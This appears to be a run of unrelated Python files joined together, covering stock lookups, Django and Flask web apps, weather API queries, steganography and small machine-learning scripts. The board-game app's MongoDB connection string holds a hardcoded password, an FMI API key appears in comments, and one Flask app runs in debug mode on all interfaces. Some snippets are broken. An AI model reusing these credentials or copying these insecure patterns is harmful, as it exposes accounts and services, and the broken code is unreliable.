print('Score: ', score)
asd = 123
if __name__ == "__main__":
main() |
import requests
import urllib.parse
from flask import redirect, render_template, request, session
from functools import wraps
def lookup(symbol):
# Contact API
try:
response = requests.get(f"https://api.iextrading.com/1.0/stock/{urllib.parse.quote_plus(symbol)}/quote")
response.raise_for_status()
except requests.RequestException:
return None
# Parse response
try:
quote = response.json()
return {
"name": quote["companyName"],
"price": float(quote["latestPrice"]),
"symbol": quote["symbol"]
}
except (KeyError, TypeError, ValueError):
return None
def usd(value):
value = float(value)
return f"${value:,.2f}"
def full_lookup(symbol):
# Contact API
try:
response = requests.get(f"https://api.iextrading.com/1.0/stock/{urllib.parse.quote_plus(symbol)}/quote")
response.raise_for_status()
except requests.RequestException:
return None
# Parse response
try:
quote = response.json()
return {
"name": quote["companyName"],
"price": float(quote["latestPrice"]),
"symbol": quote["symbol"]
}
except (KeyError, TypeError, ValueError):
return None
|
import Hierarchical_clustering
import Second_Hierarchical_clustering
import Get_feature
for data_number in range(4,5):
for t1 in range(9,10):
t1=t1*0.5
Hierarchical_clustering.frist_Hierarchical(t1,data_number)
for t2 in range(6,7):
t2=t2*0.5
Second_Hierarchical_clustering.Second_Hierarchical(t2)
Get_feature.Get_feature(t1,t2,data_number)
|
import pickle
# Define some variables that will be put into pickle
Album = ( "Rammstain",
"Mutter",
1991,
( (1, "Mutter"),
(2, "Moskau"),
(3, "Herzlich")))
var_num = 14356
var_str = "Test string to pickle"
with open("vars.pickle", "wb") as vars_pickled:
pickle.dump(Album, vars_pickled)
pickle.dump(var_num, vars_pickled)
pickle.dump(var_str, vars_pickled)
with open("vars.pickle", "rb") as vars_pickled:
Album_loaded = pickle.load(vars_pickled)
var_num_loaded = pickle.load(vars_pickled)
var_str_loaded = pickle.load(vars_pickled)
artist, album_title, year, tracks = Album_loaded
print(artist)
print(album_title)
print(year)
for track in tracks:
track_num, title = track
print("Track {0} has title {1}".format(track_num, title)) |
import scipy.optimize as op
f = lambda x: x**2 - 1e8* x + 1
x1 = op.fsolve(f, x0 = 0)
x2 = op.fsolve(f, x0 = 1e9) |
# FileName : pyTime_practice.py
# Author : Adil
# DateTime : 2018/7/27 16:17
# SoftWare : PyCharm
import time
# python中时间日期格式化符号:
# %y 两位数的年份表示(00-99)
# %Y 四位数的年份表示(000-9999)
# %m 月份(01-12)
# %d 月内中的一天(0-31)
# %H 24小时制小时数(0-23)
# %I 12小时制小时数(01-12)
# %M 分钟数(00=59)
# %S 秒(00-59)
#
# %a 本地简化星期名称
# %A 本地完整星期名称
# %b 本地简化的月份名称
# %B 本地完整的月份名称
# %c 本地相应的日期表示和时间表示
# %j 年内的一天(001-366)
# %p 本地A.M.或P.M.的等价符
# %U 一年中的星期数(00-53)星期天为星期的开始
# %w 星期(0-6),星期天为星期的开始
# %W 一年中的星期数(00-53)星期一为星期的开始
# %x 本地相应的日期表示
# %X 本地相应的时间表示
# %Z 当前时区的名称
# %% %号本身
# 获取时间戳
time1 = time.time()
print(time1)
# 获取本地时间
localTime = time.localtime(time.time())
# 格式化本地时间
localTimeStrs = time.strftime("%Y-%m-%d %H:%M:%S",localTime)
print(localTime)
print(localTimeStrs)
# 计算时间差
import datetime
day1 = datetime.datetime(2018,6,2)
day2 = datetime.datetime(2018,4,16)
# 计算指定时间的间隔
print((day1-day2).days)
# 获取当前时间
nowTime = datetime.datetime.now()
print("nowTime: ",nowTime)
# 当前指定时间
# 获取当前年份
print(nowTime.year)
print(nowTime.day)
print(nowTime.month)
print(nowTime.hour)
print(nowTime.minute)
print(nowTime.second)
# 当前时间往前推29天计算日期,也就是近30天的其实范围
beforeTime = day1 - datetime.timedelta(days=30)
# 往后推就使用 + 号,当然还可以使用 hours(小时) 、minutes(分钟)、seconds(秒)等单位运算。
print("beforeTime: ",beforeTime)
# 结果输出
# 1526451775.666749
# time.struct_time(tm_year=2018, tm_mon=5, tm_mday=16, tm_hour=14, tm_min=22, tm_sec=55, tm_wday=2, tm_yday=136, tm_isdst=0)
# 2018-05-16 14:22:55
# 30
# nowTime: 2018-05-16 14:22:55.670309
# beforeTime: 2018-04-17 14:22:55.670309
import calendar
cal = calendar.month(2018,2)
print(cal)
# 获取当前时间
curTime = datetime.date(2018,7,9)
print("设置当前时间")
print(curTime)
# 获取 前一周 的时间
beforeone = curTime - datetime.timedelta(7)
print("前一周:")
print(beforeone)
beforetwo = beforeone - datetime.timedelta(7)
print("前两周:")
print(beforetwo)
beforethr = beforetwo - datetime.timedelta(7)
print("前三周:")
print(beforethr)
beforefour = beforethr - datetime.timedelta(7)
print("前四周:")
print(beforefour)
beforefive = beforefour - datetime.timedelta(7)
print("前五周:")
print(beforefive)
# beforetwo = curTime - datetime.timedelta(6)
# print("前一周:")
# print(beforeone)
# 计算时间差
curTime1 = datetime.date(2018,5,15)
oldTime = datetime.date(2018,5,14)
print("时间差:")
print((curTime1-oldTime).days)
|
# 将字符串str01,改为str02,变化的历程写在列表中,要求历程中的字符串必须出现在字典my_dict中
my_dict = {"hot": 1, "dot": 1, "dog": 1, "lot": 1, "log": 1, "cog": 1}
# def change_str(str01,str02):
|
from rest_framework.response import Response
from rest_framework import generics
from rest_framework import mixins
from blog.serializer import PostSerializer, CommentSerializer
from blog.models import Post, Comment
class GenericPostView(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,
mixins.UpdateModelMixin, mixins.RetrieveModelMixin,
mixins.DestroyModelMixins):
serializer_class = PostSerializer
queryset = Post.objects.all()
lookup_field = 'id'
def get(self, request, id = None):
if id:
return self.retrieve(request)
else:
return self.list(request)
def post(self, request):
return self.create(request)
def put(self, request, id=None):
return self.update(request, id)
def delete(self, request, id):
return self.destroy(request, id)
class GenericCommentView(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,
mixins.UpdateModelMixin, mixins.RetrieveModelMixin,
mixins.DestroyModelMixins):
serializer_class = CommentSerializer
queryset = Comment.objects.all()
lookup_field = 'id'
def get(self, request, id = None):
if id:
return self.retrieve(request)
else:
return self.list(request)
def post(self, request):
return self.create(request)
def put(self, request, id=None):
return self.update(request, id)
def delete(self, request, id):
return self.destroy(request, id)
|
from PIL import Image
import numpy as np
from base_pic import BasePic
from base_file import BaseFile
class Stegan:
def __init__(self, pic, file):
self.pic = pic
self.file = file
self.pic_array = self.pic.bin_array
self.file_array = self.file.binary_array
self.pic_msb_array = None
self.pic_lsb_array = None
self.combined_arrays = None
def split_MSB_LSB_in_pic(self):
"""Splits the binary elements in an array into MSB and LSB. Returns two arrays"""
msb = []
lsb = []
for x in self.pic_array:
col_msb = []
col_lsb = []
for y in x:
rgb_msb = []
rgb_lsb = []
for color in y:
rgb_msb.append(color[:4])
rgb_lsb.append(color[4:])
col_msb.append(rgb_msb)
col_lsb.append(rgb_lsb)
msb.append(col_msb)
lsb.append(col_lsb)
return [msb, lsb]
def combine_arrays(self):
"""Takes the MSBs from the pic and systematically adds each 4-bit from the file array in place of the LSB"""
countdown = 0
eba = []
while True:
for x in self.pic_msb_array:
col = []
for y in x:
rgb = []
for color in y:
try:
rgb.append(self.convert_binary(color + self.file_array[countdown]))
countdown += 1
except:
rgb.append(self.convert_binary(self.fill_to_8bit(color)))
col.append(rgb)
eba.append(col)
break
return eba
def fill_to_8bit(self, var):
"""Fills a variable that is less than 8 bits up to length 8 with 0's to the right"""
return var.ljust(8, '0')
def convert_binary(self, bin):
return int(bin, 2)
def convert_back_to_image(self):
"""Converts the processed array back to an image"""
np_array = np.array(self.combined_arrays)
data = Image.fromarray(np_array, mode='RGB')
data.save('{}_steganographized.{}'.format(self.pic.file_name, self.pic.file_extension))
def auto_run(self):
two_arrays = self.split_MSB_LSB_in_pic()
self.pic_lsb_array = two_arrays[1]
self.pic_msb_array = two_arrays[0]
self.combined_arrays = self.combine_arrays()
self.convert_back_to_image()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('profile_management', '0002_auto_20160122_0639'),
('resume_management', '0002_auto_20160122_0632'),
]
operations = [
migrations.AddField(
model_name='resume',
name='addresses',
field=models.ManyToManyField(to='profile_management.Address', null=True, blank=True),
),
migrations.AddField(
model_name='resume',
name='emails',
field=models.ManyToManyField(to='profile_management.Email', null=True, blank=True),
),
migrations.AddField(
model_name='resume',
name='phone_numbers',
field=models.ManyToManyField(to='profile_management.PhoneNumber', null=True, blank=True),
),
]
|
import urllib.request
import xmltodict, json
#import pygrib
import numpy as np
import pandas as pd
from datetime import datetime
import time
# Query to extract parameter forecasts for one particular place (point)
#
# http://data.fmi.fi/fmi-apikey/f96cb70b-64d1-4bbc-9044-283f62a8c734/wfs?
# request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::multipointcoverage
# &place=valencia
# ¶meters="GeopHeight, Temperature, Pressure, Humidity, WindDirection, WindSpeedMS,
# WindUMS, WindVMS, MaximumWind, DewPoint, Precipitation1h, PrecipitationAmount"
#
def extract_forecasts_place(fmi_addr, my_api_key, data_format, parameters, place ):
request = "getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::" + data_format
query_parameters = ""
for it in range(len(parameters)-1):
query_parameters += parameters[it] + ","
query_parameters += parameters[len(parameters)-1]
query = fmi_addr + my_api_key + "/wfs" + "?" + "request" + "=" + request + "&" + "place=" + place + "&" + "parameters=" + query_parameters
print(query, "\n")
with urllib.request.urlopen(query) as fd:
query = xmltodict.parse(fd.read())
return(query)
#---------------------------------------------------------------------------------------
# Query to extract parameter forecasts for a Region Of Interest (grid defined by bbox)
#
# Query made for FMI:
# http://data.fmi.fi/fmi-apikey/f96cb70b-64d1-4bbc-9044-283f62a8c734/wfs?
# request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::grid
# & crs=EPSG::4326
# & bbox=-0.439453, 39.192884, -0.201874, 39.426647
# & parameters=Temperature,Humidity,WindDirection, WindSpeedMS
#
def extract_forecasts_grid(fmi_addr, my_api_key, query_request, data_format, coord_sys, bbox, parameters):
# data_format = grid
request = query_request + data_format
# coordinate system e.g. coord_sys = EPSG::4326
query_crs = coord_sys
# bbox = [-0.439453, 39.192884, -0.201874, 39.426647] --- region of Valencia
query_box = ""
for j in range(len(bbox)-1):
query_box += str(bbox[j]) + ","
query_box += str(bbox[len(bbox)-1])
query_parameters = ""
for it in range(len(parameters) - 1):
query_parameters += parameters[it] + ","
query_parameters += parameters[len(parameters)-1]
query = fmi_addr + my_api_key + "/wfs" + "?" + "request" + "=" + request + "&" + \
"crs=" + query_crs + "&" + "bbox=" + query_box + "&" + "parameters=" + query_parameters
print("Query made for FMI: \n{}\n".format(query))
with urllib.request.urlopen(query) as fd:
response = xmltodict.parse(fd.read())
return(response)
#-----------------------------------------------------------------------------
# Query to extract values from a grib file in data.frame (dset)
# Columns names of data.frame are:
# ['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value']
#
def extract_gribs(dataDICT):
# gml:fileReference to key for the FTP
# path for the value we need , for downloading grib2 file
FTPurl = dataDICT['wfs:FeatureCollection']['wfs:member'][1]['omso:GridSeriesObservation']['om:result']['gmlcov:RectifiedGridCoverage']['gml:rangeSet']['gml:File']['gml:fileReference']
print("Query for downloading grb file with the values asked: \n{}\n".format(FTPurl))
# Create the grib2 file
result = urllib.request.urlopen(FTPurl)
with open('gribtest.grib2', 'b+w') as f:
f.write(result.read())
gribfile = 'gribtest.grib2' # Grib filename
grb = pygrib.open(gribfile)
# Creation of dictionary, for parameters : metric system
paremeters_units = {
"Mean sea level pressure": "Pa", "Orography": "meters", "2 metre temperature": "°C",
"2 metre relative humidity": "%",
"Mean wind direction": "degrees",
"10 metre wind speed": "m s**-1",
"10 metre U wind component": "m s**-1",
"10 metre V wind component": "m s**-1",
"surface precipitation amount, rain, convective": "kg m**-2", "2 metre dewpoint temperature": "°C"}
# Create a data frame to keep all the measurements from the grib file
dset = pd.DataFrame(columns=['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value'])
for g in grb:
str_g = str(g) # casting to str
col1, col2, *_ = str_g.split(":") # split the message columns
# Temporary data.frame
temp_ds = pd.DataFrame(columns=['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value'])
meas_name = col2
meas_no = col1
g_values = g.values
lats, lons = g.latlons()
g_shape = g.values.shape
dim = g_shape[0] * g_shape[1]
temp_ds['Measurement_Number'] = [meas_no] * dim
temp_ds['Name'] = [meas_name] * dim
temp_ds['DateTime'] = [ g.validDate.isoformat() + 'Z' ] * dim
temp_ds['Lat'] = lats.flatten()
temp_ds['Long'] = lons.flatten()
temp_ds['Value'] = g_values.flatten()
dset = pd.concat([dset, temp_ds], ignore_index=True)
# close grib file
f.close()
return(dset)
|
#Deletrear letra por letra el nombre de cada uno (Pedir ingresar el nombre)
nombre = ""
for x in nombre:
print(x) |
# -*- coding: utf-8 -*-
"""
REST API serving a simple Titanic survival predictor
"""
import pandas as pd
from flask import request
from flask_restful import Resource
from app import app, api
from model import PassengerSchema
from predictor import serialized_prediction
__author__ = "Felipe Aguirre Martinez"
__email__ = "felipeam86@gmail.com"
passenger_schema = PassengerSchema(many=True, strict=True)
@api.route('/prediction')
class Prediction(Resource):
def post(self):
json_data = request.get_json()
result = passenger_schema.load(json_data)
df = pd.concat(result.data)
return serialized_prediction(df)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', processes=4) |
import io
from flask import Blueprint, jsonify
from flask import request
from common import util
from common.api import require_root
from common.api import require_user
from mediation import MediationConfig
from mediation import data_query
from mediation.data_receiver import DataInsertor
dataAPI = Blueprint('data_api', __name__)
@dataAPI.route('/query', methods=["POST"])
@require_user
def dataQueryV2():
"""
Endpoint for getting traffic data.
POST body:
{
"from":"01.02.2017",
"to":"15.02.2017",
"country":"CZ",
"lobName":"ACI",
"flowName":["GSM"],
"forwards":[],
"granularity":0
}
Response:
{
"data": [
{
"GSM": 188385532,
"_id": "2017-02-01T00:00:00+01:00",
"dayAverage": 1162595297.6666667,
"dayDifference": 1.023,
"expected": 161627916,
"status": "OK",
"tickDifference": 1.166
},
...
],
"metadata": {
"flowName": "GSM",
"granularity": 480,
"metrics": {
"GSM": {
"type": "traffic"
},
"dayAverage": {
"type": "traffic"
},
"dayDifference": {
"type": "difference"
},
"expected": {
"type": "traffic"
},
"status": {
"type": "other"
},
"tickDifference": {
"type": "difference"
}
}
}
"""
searchParam = request.get_json()
fromDate = util.stringToDate(searchParam["from"])
toDate = util.stringToDate(searchParam["to"])
country = searchParam["country"]
lobName = searchParam["lobName"]
lobConfig = MediationConfig.getLobWithCountry(country, lobName)
flows = []
granularity = searchParam.get("granularity", 0)
flows.append(lobConfig["flows"][searchParam["flowName"]])
response = {}
# Query the traffic data and add to metric list
mongoQuery = data_query.DateRangeGroupQuery(fromDate, toDate, flows, granularity=granularity)
data = mongoQuery.execute()
metrics = {}
metricsList = []
flowName = mongoQuery.metrics[0]
metricsList.append(flowName)
metadata = mongoQuery.metadata
if len(flows) == 1:
# Run outage detection analysis
metric = metricsList[0]
flowLevelQuery = data_query.FlowLevelDateRangeQuery(fromDate, toDate, flows, metadata["granularity"], data)
flowLevelData = flowLevelQuery.execute()
data = util.merge2DateLists(flowLevelData, None, data, None)
metricsList.extend(flowLevelQuery.metrics)
outageQuery = data_query.OutageDateRangeQuery(fromDate, toDate, flows[0], metadata["granularity"])
outageQuery.setPrecomputedData(data, metric)
outageList = outageQuery.execute()
data = util.merge2DateLists(outageList, [outageQuery.metric], data, None)
metricsList.append(outageQuery.metric)
# Create metadata infor
for metric in metricsList:
if metric == flowName or metric == "dayAverage" or metric == "expected":
type = "traffic"
elif "Difference" in metric:
type = "difference"
else:
type = "other"
metrics[metric] = {"type": type}
response["data"] = data
response["metadata"] = {**{"metrics": metrics}, **metadata, "flowName": flowName}
return jsonify(response)
@dataAPI.route('/insert', methods=["POST"])
@require_root
def insertData():
f = request.files['file']
stream = io.StringIO(f.stream.read().decode("UTF8"), newline=None)
insertor = DataInsertor()
insertor.run(stream)
return jsonify({})
# @dataAPI.route('/best_correlations', methods=["GET"])
# def bestCorrelations():
# lobName = request.args.get('lobName')
# granularity = int(request.args.get('granularity'))
# from support_development_packages.data_util import correlation
# bestCorrelations = correlation.getBestCorrelations(lobName, granularity=granularity)
# return jsonify(bestCorrelations)
#
#
# @dataAPI.route('/averages', methods=["GET"])
# def getDayAverages():
# lobName = request.args.get('lobName')
# from support_development_packages.data_util.moving_average import DayAverageExecutor
# return jsonify(DayAverageExecutor.getDayAverages(lobName))
#
#
# @dataAPI.route('/day_medians', methods=["GET"])
# def getDayMedians():
# """deprecated"""
# lobName = request.args.get('lobName')
# requestDate = request.args.get('date')
# if requestDate is None:
# requestDate = datetime.datetime.now()
# else:
# requestDate = util.jsStringToDate(requestDate)
# requestDate = util.resetDateTimeMidnight(requestDate)
# medianQuery = data_query.ExpectedTrafficQuery(lobName, requestDate)
# medians = medianQuery.execute()
# dataList = util.dateDictToList(data_query.minuteDictToDateDict(requestDate, medians, "median"))
# response = {}
# response["data"] = dataList
# response["granularity"] = medianQuery.metadata["granularity"]
# response["metrics"] = ["median"]
# return jsonify(response)
#
# def createMergedFlowsObject(country, lobName, flowType):
# flow = {}
# flow["name"] = lobName + "-" + flowType
# flow["type"] = "all_forwards"
# flow["lobName"] = lobName
# flow["dataPath"] = country + "." + lobName + "." + flowType + ".sum"
# flow["gName"] = lobName + "_" + flowType
# flow["country"] = country
# flow["options"] = MediationConfig.getLobWithCountry(country, lobName)["options"]
# return flow
# def smoothData(data, granularity, validMetricName):
# dataList = []
# for row in data:
# dataList.append(row[validMetricName])
# smoothedData = smooth.smoothData(granularity, dataList)
# for index, elem in enumerate(smoothedData):
# data[index][validMetricName + "_smoothed"] = elem
|
from time import sleep
import requests
import pandas as pd
import matplotlib.pyplot as plt
from config import password
from date_handler import date_id_sequence, to_string
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Float, func, create_engine, ForeignKey, text, and_
from sqlalchemy.orm import Session
import datetime as dt
from flask import jsonify
#Create ORM Classes
Base=declarative_base()
class Sector(Base):
__tablename__="sectors"
sector_id = Column(Integer, primary_key=True)
sector = Column(String(30))
class Ticker(Base):
__tablename__="tickers"
ticker = Column(String(30),primary_key=True)
company_name = Column(String(100))
sector_id = Column(Integer, ForeignKey("sectors.sector_id"))
class Currency(Base):
__tablename__="currencies"
currency_id = Column(Integer, primary_key=True)
currency_symbol = Column(String(50))
class Date(Base):
__tablename__="calendar"
date_id = Column(Integer,primary_key=True)
day = Column(Integer)
month = Column(Integer)
day_of_year = Column(Integer)
day_of_quarter = Column(Integer)
year = Column(Integer)
class Stock(Base):
__tablename__="stocks"
ticker = Column(String(30),ForeignKey("tickers.ticker"),primary_key=True)
date_id = Column(Integer,ForeignKey("calendar.date_id"),primary_key=True)
open_price = Column(Float())
close_price = Column(Float())
high_price = Column(Float())
low_price = Column(Float())
volume = Column(Integer)
class Exchange_rate(Base):
__tablename__="exchange_rates"
from_currency_id = Column(Integer, ForeignKey("currencies.currency_id"),primary_key=True)
to_currency_id = Column(Integer, ForeignKey("currencies.currency_id"),primary_key=True)
date_id = Column(Integer, ForeignKey("calendar.date_id"),primary_key=True)
open_value = Column(Float())
close_value = Column(Float())
#Create Connection
try:
conn.close()
except NameError:
pass
def get_data(currency,ticker,from_date,to_date):
engine = create_engine(f"postgresql://postgres:{password}@localhost:5432/Stocks")
conn = engine.connect()
session = Session(bind=engine)
Base.metadata.create_all(engine)
currency_id = session.query(Currency.currency_id).filter(Currency.currency_symbol == currency).one()[0]
E = Exchange_rate
# max_date = max([x[0] for x in
# session.query(Exchange_rate.date_id).filter(and_(E.from_currency_id == 1,E.to_currency_id == currency_id)).all()])
ex_rates = session.query(Exchange_rate.date_id,Exchange_rate.open_value,Exchange_rate.close_value).filter(and_(E.from_currency_id==1,
E.to_currency_id==currency_id)).subquery()
# e_rate = session.query(ex_rates.c.open_value).filter(ex_rates.c.date_id>=max_date).subquery()
# data = session.query(Stock.ticker,
# Stock.date_id,
# (Stock.open_price*e_rate).label(f"open_{ticker}_{currency}"),
# (Stock.high_price*e_rate).label(f"high_{ticker}_{currency}"),
# (Stock.low_price*e_rate).label(f"low_{ticker}_{currency}"),
# (Stock.close_price*e_rate).label(f"close_{ticker}_{currency}"),
# Stock.volume).\
# filter(and_(Stock.ticker==ticker,
# Stock.date_id >= from_date,
# Stock.date_id < to_date)).all()
data = session.query(Stock.ticker,
Stock.date_id,
(Stock.open_price*ex_rates.c.open_value).label(f"open_{ticker}_{currency}"),
(Stock.high_price*ex_rates.c.open_value).label(f"high_{ticker}_{currency}"),
(Stock.low_price*ex_rates.c.open_value).label(f"low_{ticker}_{currency}"),
(Stock.close_price*ex_rates.c.close_value).label(f"close_{ticker}_{currency}"),
Stock.volume).\
filter(and_(Stock.ticker==ticker,
Stock.date_id >= from_date,
Stock.date_id < to_date,
Stock.date_id == ex_rates.c.date_id)).all()
data_json = {}
data_json['Request_Data'] = {'Ticker' : ticker ,
'Currency' : currency ,
'From_Date' : from_date ,
'To_Date': to_date}
data_json['Stock_Data'] = {}
for x in data:
print(to_string(x[1]))
data_json['Stock_Data'][to_string(x[1])] = {'open_price' : str(round(x[2],2))+f' {currency}',
'high_price' : str(round(x[3],2))+f' {currency}',
'low_price' : str(round(x[4],2))+f' {currency}',
'close_price' : str(round(x[5],2))+f' {currency}',
'volume' : str(x[6])}
conn.close()
return data_json
print(get_data('RUB','A',20200000,20200225))
|
# 逻辑回归
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score, recall_score
# Read data from `.txt` file
def read_from_txt(filePath):
f = open(filePath)
line = f.readline()
data_list = []
while line:
num = list(map(str, line.split(',')))
data_list.append(num)
line = f.readline()
f.close()
array_data = np.array(data_list)
return array_data
# 读取数据及预处理
raw_data = read_from_txt('data_banknote_authentication.txt')
data = raw_data[:, :4].astype(float)
data = StandardScaler().fit_transform(data)
labels = raw_data[:, 4]
labels = [int(i[0]) for i in labels]
# 洗牌,不洗牌的话测试集全为一类
np.random.seed(1)
idx = np.arange(len(labels))
np.random.shuffle(idx)
data = data[idx]
labels = np.array(labels)[idx]
# 划分训练集与测试集
train_data = data[:1200]
train_label = labels[:1200]
test_data = data[1200:]
test_label = labels[1200:]
# 训练
clf = LogisticRegression(random_state=0).fit(train_data, train_label)
# 预测
pred_label = clf.predict(test_data)
# 输出 precision 及 recall
print(precision_score(test_label, pred_label))
print(recall_score(test_label, pred_label))
|
"""
This file contains the implementation of the Typofinder class.
Use this class to find typos in a file based on a dictionary.
"""
import logging
from src.utils import get_words
logging.basicConfig(format='[%(asctime)s][%(levelname)8s][%(name)s]: %(message)s')
_root_log = logging.getLogger("typofinder")
_log = _root_log.getChild(__name__)
class Typofinder(object):
"""
Uses a Linguist to decide if a file has typos.
"""
def __init__(self, linguist, text_file_path):
self._log = _log.getChild(self.__class__.__name__)
self._linguist = linguist
self._text_file_path = text_file_path
self._result_map = {}
def print_result_map(self):
"""
Prints a file's typos and suggestions for misspelled words in a table format.
"""
if not self._result_map:
_log.debug("Result map is empty.")
return
print("\n" + "+" * 72)
print("{0:33} ==> {1:>33}".format("Unknown word", "Suggestion"))
print("-" * 72)
for word, suggestion in sorted(self._result_map.items()):
if suggestion:
print("{0:33} ==> {1:>33}".format(word, suggestion))
else:
print("{0:33}".format(word))
print("+" * 72 + "\n")
def print_affected_rows(self, is_overwrite_mode=False):
"""
Prints the text file's lines (and it's numbers) where typos were detected.
It is useful for logging information.
"""
if not self._result_map:
_log.debug("Result map is empty.")
return
content = file(self._text_file_path).readlines()
content = [line.strip("\n") for line in content]
line_number = 0
for line in content:
line_number += 1
line_word_set = set(get_words(line))
typo_list = self._result_map.keys()
# Lowering the line's words is necessary because the Linguist's dictionary
# contains the words in lowercase too.
if not set([word.lower() for word in line_word_set]).intersection(typo_list):
# Checking line is unnecessary because there is no unknown word. Skip to next line.
continue
for word in line_word_set:
word_lowered = word.lower()
if word_lowered not in typo_list:
continue
suggestion = self._result_map.get(word_lowered)
if suggestion:
line = line.replace(word, "[[%s ==> %s]]" % (word, suggestion))
else:
line = line.replace(word, "[[%s]]" % word)
if is_overwrite_mode:
content[line_number - 1] = line
else:
print("%d:%s" % (line_number, line.strip()))
if is_overwrite_mode:
with open(self._text_file_path, 'w') as f:
# The newline character is needed for the end of the file.
f.write("\n".join(content) + "\n")
else:
print("")
def execute(self):
"""
Checks a file for typos and makes suggestions based on the Linguist.
The typofinder's result map will contain the unknown words and a suggestion for fix if possible.
"""
_log.info("Executing typofinder on \'%s\'" % self._text_file_path)
if not self._linguist.get_dictionary():
_log.error("Linguist's dictionary is empty. Couldn't recognize typos in file(s).")
return
content = set(get_words(file(self._text_file_path).read()))
difference = self._linguist.not_known(content)
if not difference:
_log.info("No typo(s) found in file: \'%s\'" % self._text_file_path)
return
for word in difference:
self._result_map[word] = self._linguist.correct(word)
print("Unknown word(s) has been found in file: \'%s\'" % self._text_file_path)
|
import re
import urllib.request
from pathlib import Path
from django.core.management import BaseCommand
from django.db.models.signals import post_save
from django.utils import timezone
from pybb.models import Post, Topic
from pybb.signals import post_saved
from notifications.models import create_pybb_post_notification
from pandas import read_csv
class Command(BaseCommand):
help = "First run: store images. Second run: replace links."
def handle(self, *args, **options):
s = ''
s += "Post ID,Image Link,Filename\n"
table = read_csv('forum/dat/images/list.csv')
from pybb.signals import topic_saved
# FIXME: we should have specific signals to send notifications to topic/forum subscribers
# but for now, we must connect / disconnect the callback
post_save.disconnect(topic_saved, sender=Topic)
post_save.disconnect(create_pybb_post_notification, sender=Post)
post_save.disconnect(post_saved, sender=Post)
for i in range(len(table)):
post_id = int(table['Post ID'][i])
old_link = table['Image Link'][i]
filename = table['Filename'][i]
new_link = 'https://files.le-francais.ru/images/forum/' + filename
post = Post.objects.get(id=post_id)
post.body = post.body.replace(old_link, new_link)
post.save()
post_save.connect(topic_saved, sender=Topic)
post_save.connect(create_pybb_post_notification, sender=Post)
post_save.connect(post_saved, sender=Post)
for post in Post.objects.all():
if post.created < timezone.now()-timezone.timedelta(weeks=24):
continue
for link in re.findall('\((((http://)|(https://))(\S+?\.(png|jpeg|gif|jpg)))', post.body, re.I):
file_name = link[0].split('//')[1]
file_name = re.sub('/', '+', file_name)
file_name = re.sub(',', '_', file_name)
if link[0].startswith('https://files.le-francais.ru'):
continue
image_string = 'https://www.le-francais.ru' + str(post.get_absolute_url()) + '\t' + link[0]
file = Path('forum/dat/images/' + file_name[:])
try:
print(image_string, end='')
if not file.is_file():
opener= urllib.request.build_opener()
opener.addheaders = [('User-Agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(link[0], 'forum/dat/images/' + file_name[:])
print(' Success!')
else:
print(' File already exist')
s += str(post.id) + ',' + link[
0] + ',' + file_name[:] + '\n'
except:
print(' Error')
open('forum/dat/images/list.csv', 'w').write(s)
|
from flask import Flask, render_template, url_for, request, redirect, session
import pymongo
from pymongo import MongoClient
from bson.objectid import ObjectId
from mongoengine import *
import requests
import re
client = MongoClient("mongodb+srv://teama7:ee461lteama7@mongodbcluster.bs58o.gcp.mongodb.net/BGDB?retryWrites=true&w=majority")
db = client["BGDB"]
connect('BGDB', host='localhost', port=27017)
boardgameobjects = client["BGDB"].boardgamecollection
genre_objects = client["BGDB"].genrecollection
publish_objects = client["BGDB"].publishercollection
gamepagerequest = ''
pubnamerequest = ''
genre_name_request = ''
pubpagerequest = {}
genre_page_request = {}
app = Flask(__name__)
def GameLinkify(name):
linkformat = re.compile('[^a-zA-Z0-9]')
linkname = linkformat.sub('', name)
return linkname
def PublisherNames():
#Function now returns tupple of list to so game and publisher are tied for publisher page elements.
bgc = boardgameobjects.find()
publishernames = []
publishernameGame = []
publishYear = []
for game in bgc:
if game['Publisher'] not in publishernames:
if game['Publisher'] == 'None':
game['Publisher'] = "unaffiliated"
publishernames.append(game['Publisher'])
publishernameGame.append(game['Name'])
publishYear.append(game['Year_Published'])
#print (publishernames) #Debuggin
#print (publishernameGame)
return publishernames, publishernameGame, publishYear
@app.route('/')
def home():
games = boardgameobjects.find().limit(3)
genres = genre_objects.find().limit(3)
publishers = publish_objects.find().limit(3)
return render_template('home.html', games=games, genres=genres, publishers=publishers)
@app.route('/about')
def about():
return render_template('about.html')
############# LIST PAGES #####################
@app.route('/boardgames/<int:page>')
def games(page):
global boardgameobjects
gameobjects = boardgameobjects.find()
return render_template('Board_Games_List.html', gameobjects=gameobjects, page=page,)
@app.route('/boardgamegenres/<int:page>')
def genres(page):
global genre_objects
genre_obj = genre_objects.find()
return render_template('Genres_List.html', genres=genre_obj, page=page)
@app.route('/boardgamepublishers/<int:page>', methods=['POST', 'GET'])
def publishers(page):
global boardgameobjects
publishersTupple = PublisherNames()
publishers = publishersTupple[0]
publishergame = publishersTupple[1]
publishyear = publishersTupple[2]
publishers = publish_objects.find()
gameobjects = boardgameobjects.find()
return render_template('Publishers_List.html', publishers=publishers, publishernames=publishers, gameobjects=gameobjects, publishergame=publishergame, publishyear=publishyear, page=page)
############ ROUTE TO GENRE INSTANCE PAGES ############
@app.route('/genre', methods=['POST'])
def genre_routing():
genre_name = request.form['genrename']
global genre_name_request
genre_name_request = genre_name
genre_link = GameLinkify(genre_name)
return redirect(url_for('.genre_page', genre_link=genre_link))
@app.route('/genre/<genre_link>', methods=['POST', 'GET'])
def genre_page(genre_link):
global genre_name_request
global genre_objects
genre = genre_objects.find({'Name': genre_name_request}).next()
return render_template("Genre_Template.html", genre=genre)
############ ROUTE TO PUBLISHER INSTANCE PAGES ############
@app.route('/publisher', methods=['POST'])
def PubRouting():
publisher_name = request.form['publishername']
